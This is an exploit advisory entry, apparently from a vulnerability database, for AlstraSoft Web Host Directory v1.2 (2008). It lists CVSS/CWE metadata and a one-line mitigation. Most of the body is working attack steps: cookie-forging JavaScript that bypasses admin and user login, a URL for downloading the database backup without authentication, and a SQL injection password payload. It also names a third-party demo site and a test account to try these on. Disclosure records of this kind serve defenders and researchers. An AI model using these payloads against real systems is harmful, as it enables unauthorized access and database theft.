vendor:
Web Host Directory
by:
G4N0K
7.5
CVSS
HIGH
Insecure Cookie Handling, Arbitrary Database Backup, SQLi Auth Bypass
20, 89, 79
CWE
Product Name: Web Host Directory
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:alstrasoft:web_host_directory:1.2
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities
admin Auth bypass, panel => http://localhost/[paht]/admin/; javascript:document.cookie = "adm=1"; users Auth bypass; javascript:document.cookie = "logged=[username]"; we can download a Backup of Database; http://localhost/[paht]/admin/backup/db; Username : [a_valid_username]; Password : ' OR ' 1=1--; http://www.hyperstop.com/demo/webhost/; username: testtest; password: ' OR ' 1=1--; javascript:document.cookie = "logged=testtest";
Mitigation:
Ensure that cookies are properly validated and sanitized before use, use parameterized queries to prevent SQL injection, and ensure that all user input is properly validated and sanitized.